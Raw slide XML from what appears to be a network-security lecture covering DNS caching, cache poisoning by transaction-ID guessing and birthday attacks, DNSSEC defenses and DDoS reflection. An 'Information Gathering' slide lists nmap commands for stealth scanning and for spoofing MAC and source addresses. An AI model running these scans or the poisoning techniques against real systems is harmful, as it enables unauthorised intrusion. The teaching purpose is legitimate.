        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="209380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16D436-5885-A778-EC7D-81204090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 Caching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878E9-4A70-1639-C245-3A2A72E3D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0811CD8-CACB-9A10-6239-836288E1360E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1447800" y="1757979"/>
            <a:ext cx="80010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DNS responses are cached </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Quick response for repeated translations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Useful for finding servers as well as addresses </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>NS records for domains </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Negative results are cached</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Save time for nonexistent sites, e.g. misspelling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Cached data periodically times out</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Each record has a TTL field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6BECFE-CB3B-4D7E-78F9-065E22115F66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514600" y="5760781"/>
            <a:ext cx="6324600" cy="6096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Where are the problems?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="201662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85D1E8-D1BF-B1B2-DE73-7523D49D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DNS Vulnerabilities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C1A2-DC6B-F214-835A-7C72A8EA6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381E17E-2E3B-CD80-B9FD-6F1FAE0A2242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1794889"/>
            <a:ext cx="83820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Users/hosts typically trust the host-address mapping provided by DNS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What bad things can happen with wrong DNS info? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>DNS resolvers trust responses received after sending out queries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How to attack?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Responses can include DNS information unrelated to the query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Obvious problems </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>No authentication for DNS responses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="294230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58AE9D-B206-13CD-758A-6982A034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 Cache Poisoning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B71E9-54C1-72D0-B77F-71F364253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A35E3D-E674-E78B-DD59-334D0AE8B39D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600784" y="1638300"/>
            <a:ext cx="9753016" cy="4987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Exploit DNS poisoning attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Change IP addresses to redirect URLs to fraudulent sites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Potentially more dangerous than phishing attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>No email solicitation is required</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>DNS poisoning attacks have occurred:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>January 2005, the domain name for a large New York ISP, Panix, was hijacked to a site in Australia. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>In November 2004, Google and Amazon users were sent to Med Network Inc., an online pharmacy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>In March 2003, a group dubbed the "Freedom Cyber Force Militia" hijacked visitors to the Al-Jazeera Web site and presented them with the message "God Bless Our Troops"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25354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4DEBF-678C-F75F-2A6C-86690521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NS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ADBFD-D0ED-146C-1B79-27A488FFA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DC9E6-4126-0C92-2476-D61ADD066665}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="1636031"/>
            <a:ext cx="9982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DNS resource records (see RFC 1034)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An “A” record supplies a host IP address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A “NS” record supplies name server for domain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Example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evil.org NS ns.yahoo.com  		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200"/>
              <a:t>/delegate to yahoo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ns.yahoo.com A 1.2.3.4             	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200"/>
              <a:t>/ address for yahoo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="280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Result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If resolver looks up www.evil.org, then evil name server will give resolver address 1.2.3.4 for yahoo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Lookup yahoo through cache goes to 1.2.3.4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2466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09D0C4-9567-28D7-4070-2829F33DA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DNS Cache Poisoning: Racing to Respond First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8D7A-1EFE-82B1-1E7E-40C2E9824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683FE4-1393-3809-479A-1EF3716C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528" y="1625600"/>
            <a:ext cx="9814922" cy="518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52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5AC394-9F30-E411-DE7A-39952397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 Cache Poisoning Principle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17281-8448-923B-DE84-F9F7FB374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849096-A634-69CC-CE0C-303B4504C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31784"/>
            <a:ext cx="9578009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Attacker wants his IP address returned for a DNS query</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>When the resolver asks ns1.google.com for www.google.com, the attacker could reply first, with his own IP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>What is supposed to prevent this?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Transaction ID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>16-bit random number</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>The real server knows the number, because it was contained in the query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>The attacker has to guess</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="411763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3BD7FF-7EE0-FB30-125E-5F86B783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DNS Cache Poisoning – Exploiting the Vuln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171FB-4624-BDFF-F15A-F3338252B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100C769-978F-4378-6F06-7BD24CA7A7D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1292087" y="1840679"/>
            <a:ext cx="83058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/>
              <a:t>Responding before the real nameserver</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>An attacker can guess when a DNS cache entry times out and a query has been sent, and provide a fake response.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>The fake response will be accepted only when its 16-bit transaction ID matches the query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>CERT reported in 1997 that BIND uses sequential transaction ID and is easily predicted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>fixed by using random transaction IDs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="163215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A379-A0B3-0F52-10BB-AE53DA99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77"/>
            <a:ext cx="10515600" cy="894622"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Information Gathering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6324B-5B13-EB1C-B0C3-211830C9A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ED544-75AB-01B2-BFE5-07910813BBD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1286604"/>
            <a:ext cx="10515600" cy="6004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Nmap with various probing options, e.g.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Find out the open ports of our nameserver </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> just plain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="200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ym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Nmap –A –T4 –p- IP  -A operating system, -T timing (0-5, too not send too many requests per time unit), -p the port range (-p- all ports), all TCP by default, otherwise e.g. –p U:53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ym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Can also obfuscate your own footprint, e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> –spoof-mac 0 IP  changes MAC addresses, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> –S IP –e eth0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>otherIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> spoofs your 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ym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Stealth scanning </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>sS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> –p80 IP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ym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Do various scans and check what’s happening on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>wireshark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dnsenum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t> zonetransfer.me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dnsmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t> Microsoft.com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spiderfoot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> creates graph of domain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0784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8B2AFC-E586-35B0-E1A0-34114EBF9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sz="3600"/>
              <a:t>Improve the chance of responding before the real nameserver (discovered by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3600" err="1"/>
              <a:t>Vagner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3600"/>
              <a:t> Sacramento in 2002)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200"/>
              <a:t>Have many (say hundreds of) clients send the same DNS request to the name server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Each generates a query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200"/>
              <a:t>Send hundreds of reply with random transaction IDs at the same time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200"/>
              <a:t>Due to the Birthday Paradox, the success probability can be close to 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3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967295-099C-02F2-333B-76CE9A95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DNS Cache Poisoning – Enhance the Prob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DD170-7FEE-BD19-AD2C-0E59E091E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9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95CA97-78CD-A28B-E95F-CF0040F0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/>
              <a:t>Early versions of DNS servers deterministically incremented the ID field</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Vulnerabilities were discovered in the random ID generation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Weak random number generator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The attacker is able to predict the ID if knowing several IDs in previous transactions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Birthday attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Force the resolver to send many identical queries, with different IDs, at the same time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Increase the probability of making a correct guess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24F7C-5F2E-9698-09A6-46EE26F7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DNS Cache Poisoning – Guess the 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31091-6AA5-405D-7ED8-02E42B817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861115-1148-3102-88F2-1DB25F94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/>
              <a:t>Difficulty to change the protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Protocol stability (embedded devices)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Backward compatible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Long-term</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Cryptographic protections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>E.g., DNSSEC, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>DNSCurve</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Require changes to both recursive and authority servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>A multi-year process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Short-term</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Only change the recursive server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Easy to adopt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9438A9-7E44-20F6-A9CC-D1390A04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 Poisoning Defenses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D75F-7951-06AB-5743-1D8F94CEA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8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9303E9-A29E-5E7F-F6CB-49FCD6D6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DDoS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B63B-C29B-3A0B-70A9-2BECAD3B0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883529AA-77AF-66FD-DE53-FDBF731367A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1849893" y="1459513"/>
            <a:ext cx="8492213" cy="4983576"/>
            <a:chOff x="774839" y="1206246"/>
            <a:chExt cx="9144000" cy="5531485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5E470602-4EB2-C87E-BDEC-A854DF4321B4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="774839" y="1206246"/>
              <a:ext cx="9144000" cy="857250"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9144000" h="857250">
                  <a:moveTo>
                    <a:pt x="9144000" y="85725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857250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9144000" y="857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C928CE59-FC8F-5CF7-5258-F42FB2990DA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0239" y="1491996"/>
              <a:ext cx="6705600" cy="5245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719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2FEAE5-5880-55D8-BDAA-7CB2238B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DDoS Attacks - Hiding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5A6BD-CF4B-ECEB-99F7-EEB6547CF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42DC484-3A15-0188-32E3-FCDF5033766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724025"/>
            <a:ext cx="10515600" cy="4351338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83540" indent="-342265">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="785"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="3365CC"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="383540" algn="l"/>
                <a:tab pos="384175" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr spc="-10"/>
              <a:t>Reflection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="784225" marR="5080" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="585"/>
              </a:spcBef>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="784225" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Find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big</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-2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sites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with</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-2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lots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of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-2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resources,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send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packets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 spc="-20">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>with </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>spoofed</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-2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source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address,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-1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response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to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-25">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>victim</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1183640" lvl="2" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="535"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1183640" algn="l"/>
                <a:tab pos="1184275" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>PING</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-2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=&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-1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PING</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-15">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-10">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>response</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1183640" lvl="2" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="530"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1183640" algn="l"/>
                <a:tab pos="1184275" algn="l"/>
                <a:tab pos="1911350" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" spc="-25">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	=&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="40">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-10">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SYN-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-25">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ACK</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
